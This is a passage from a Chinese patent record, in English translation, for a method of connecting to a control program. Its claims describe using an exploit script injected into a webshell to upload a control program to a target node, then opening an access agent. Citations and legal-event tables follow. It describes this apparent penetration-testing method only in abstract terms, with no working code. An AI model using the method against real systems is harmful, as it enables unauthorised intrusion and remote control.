starting an http server, mounting a control program on the http server, and executing a remote downloading command on the target node to be controlled by utilizing an execution command corresponding to an operating system so as to upload the control program to the target node to be controlled.
6. The method according to claim 5, wherein uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system further comprises:
and writing a preset script on the target node to be controlled by using an execution command corresponding to the operating system and running a script downloading command so as to upload a control program to the target node to be controlled.
7. The method of claim 6, wherein uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system further comprises:
and writing a control program to the target node to be controlled by using an execution command corresponding to the operating system.
8. A connection device for a control program, comprising:
the acquisition module is used for acquiring a target node to be controlled and a corresponding vulnerability exploitation script in the target network;
the reading module is used for reading the vulnerability exploiting script and obtaining executable actions corresponding to the vulnerability exploiting script;
the transmission module is used for uploading a control program to the target node to be controlled by using the webshell when the vulnerability exploitation script can be successfully injected into the webshell;
and the connection module is used for opening an access agent on the target node to be controlled by utilizing the webshell and establishing connection with the target node to be controlled by utilizing the access agent.
9. An electronic device, comprising:
at least one processor; and
a memory communicatively coupled to the at least one processor;
the memory stores instructions executable by the at least one processor to enable the at least one processor to perform the method of any one of claims 1-7.
10. A non-transitory computer readable storage medium storing computer instructions for causing the computer to perform the method of any one of claims 1-7.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202311837033.7A CN117478721B (en) | 2023-12-28 | 2023-12-28 | Connection method, device, equipment and storage medium for control program |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202311837033.7A CN117478721B (en) | 2023-12-28 | 2023-12-28 | Connection method, device, equipment and storage medium for control program |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN117478721A true CN117478721A (en) | 2024-01-30 |
| CN117478721B CN117478721B (en) | 2024-04-12 |
Family
ID=89631616
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202311837033.7A Active CN117478721B (en) | 2023-12-28 | 2023-12-28 | Connection method, device, equipment and storage medium for control program |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN117478721B (en) |
Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20180129595A1 (en) * | 2016-11-09 | 2018-05-10 | Rsupport Co., Ltd. | Method of automatically testing smart device application program using permission booster |
| US20200387369A1 (en) * | 2019-06-06 | 2020-12-10 | International Business Machines Corporation | Determining caller of a module in real-time |
| CN115643112A (en) * | 2022-12-22 | 2023-01-24 | 杭州默安科技有限公司 | Method and device for testing safety protection capability |
| CN116185880A (en) * | 2023-04-27 | 2023-05-30 | 北京翼辉信息技术有限公司 | Automatic test method, device, equipment and medium for embedded system |
| CN116484380A (en) * | 2023-03-31 | 2023-07-25 | 中国科学院信息工程研究所 | Automatic penetration test method and system for cloud native application |
| CN116545769A (en) * | 2023-06-30 | 2023-08-04 | 北京华云安信息技术有限公司 | Remote loading type scanning method, device and equipment based on combined module |
-
2023
- 2023-12-28 CN CN202311837033.7A patent/CN117478721B/en active Active
Patent Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20180129595A1 (en) * | 2016-11-09 | 2018-05-10 | Rsupport Co., Ltd. | Method of automatically testing smart device application program using permission booster |
| US20200387369A1 (en) * | 2019-06-06 | 2020-12-10 | International Business Machines Corporation | Determining caller of a module in real-time |
| CN115643112A (en) * | 2022-12-22 | 2023-01-24 | 杭州默安科技有限公司 | Method and device for testing safety protection capability |
| CN116484380A (en) * | 2023-03-31 | 2023-07-25 | 中国科学院信息工程研究所 | Automatic penetration test method and system for cloud native application |
| CN116185880A (en) * | 2023-04-27 | 2023-05-30 | 北京翼辉信息技术有限公司 | Automatic test method, device, equipment and medium for embedded system |
| CN116545769A (en) * | 2023-06-30 | 2023-08-04 | 北京华云安信息技术有限公司 | Remote loading type scanning method, device and equipment based on combined module |
Also Published As
| Publication number | Publication date |
|---|---|
| CN117478721B (en) | 2024-04-12 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN108268305A (en) | For the system and method for virtual machine scalable appearance automatically | |
| CN113990354A (en) | Audio control method, device, equipment and storage medium based on Linux | |
| CN112732616A (en) | BMC starting method, device and equipment based on SPI controller | |
| CN110881224B (en) | Network long connection method, device, equipment and storage medium | |
| CN113791792B (en) | Method, device and storage medium for acquiring application call information | |
| CN117478721B (en) | Connection method, device, equipment and storage medium for control program | |
| CN116545769B (en) | Remote loading type scanning method, device and equipment based on combined module | |
| EP3059692A1 (en) | System and method for antivirus checking of objects from a plurality of virtual machines | |
| CN112685203B (en) | Operation acquisition method and device, storage medium and electronic equipment | |
| CN111209051B (en) | Optimization acceleration method and device based on domestic operating system | |
| CN107220149B (en) | Method and system for capturing debugging data of wireless communication module in Linux system under Windows | |
| CN117499161B (en) | Network security testing method and device, electronic equipment and storage medium | |
| CN112073505A (en) | Method for unloading on cloud server, control device and storage medium | |
| CN114228745B (en) | Driving system module control method, device, equipment, medium, product and vehicle | |
| CN112511344B (en) | Master-slave equipment network sharing method and device and Internet of things equipment | |
| CN114826886B (en) | Disaster recovery method and device for application software and electronic equipment | |
| CN116886463B (en) | Cascade communication method, device, equipment and medium | |
| CN112015350B (en) | Method, device and medium for unloading data disk of virtual machine | |
| CN106484589B (en) | Port access monitoring method and device | |
| CN113965621A (en) | Monitoring prompt method, device, computer and readable storage medium | |
| CN116627825A (en) | Method, device, equipment and storage medium for detecting software behavior | |
| CN116455809A (en) | Method, device, equipment and storage medium for processing data after link abnormality | |
| CN116232684A (en) | Authority verification method, device, equipment and storage medium based on route jump | |
| CN105320853A (en) | Information monitoring method and device and terminal | |
| CN113536292A (en) | Cloud mobile phone application starting control method, related device and computer program product |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |